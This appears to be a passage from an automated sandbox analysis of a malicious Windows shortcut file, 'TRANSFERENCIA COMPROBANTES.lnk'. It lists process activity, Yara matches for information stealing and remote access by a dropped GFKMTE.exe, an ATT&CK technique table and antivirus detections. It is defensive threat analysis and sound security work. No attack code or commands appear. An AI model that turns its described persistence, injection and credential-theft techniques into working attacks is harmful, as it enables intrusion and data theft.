                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        Source: Yara match, File source: 24.2.GFKMTE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 25.2.GFKMTE.exe.29ba2dc.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 21.2.GFKMTE.exe.293a5ec.2.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: Process Memory Space: GFKMTE.exe PID: 8044, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: GFKMTE.exe PID: 8112, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: GFKMTE.exe PID: 576, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: GFKMTE.exe PID: 6972, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match, File source: 24.2.GFKMTE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 25.2.GFKMTE.exe.29ba2dc.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 21.2.GFKMTE.exe.293a5ec.2.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000018.00000002.1481629234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.1647276247.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.1647276247.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.1498518965.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.1498518965.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.1512091151.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.1498518965.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 8044, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 8112, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 576, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: GFKMTE.exe PID: 6972, type: MEMORYSTR
                        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                        | Gather Victim Identity Information | 521 Scripting | Valid Accounts | 1 Exploitation for Client Execution | 521 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                        | Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Extra Window Memory Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 23 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                        | Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 211 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 121 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
                        | Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Scheduled Task/Job | 12 Software Packing | NTDS | 11 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 51 Virtualization/Sandbox Evasion | SSH | Keylogging | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                        | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 51 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                        | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 211 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                        [Behavior graph image not reproduced. Behavior Graph ID: 1571198; Sample: TRANSFERENCIA COMPROBANTES.lnk; Startdate: 09/12/2024; Architecture: WINDOWS; Score: 100]

                        | Source | Detection | Scanner | Label | Link |
                        | TRANSFERENCIA COMPROBANTES.lnk | 39% | ReversingLabs | Script-PowerShell.Trojan.Boxter |  |
                        | TRANSFERENCIA COMPROBANTES.lnk | 44% | Virustotal |  | Browse |
                        | TRANSFERENCIA COMPROBANTES.lnk | 100% | Joe Sandbox ML |  |  |

                        | Source | Detection | Scanner | Label | Link |
                        | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe | 100% | Avira | TR/Dropper.MSIL.Gen |  |
                        | C:\Users\user\AppData\Local\Temp\ .doc | 100% | Avira | HEUR/Macro.Downloader.MRDO.Gen |  |
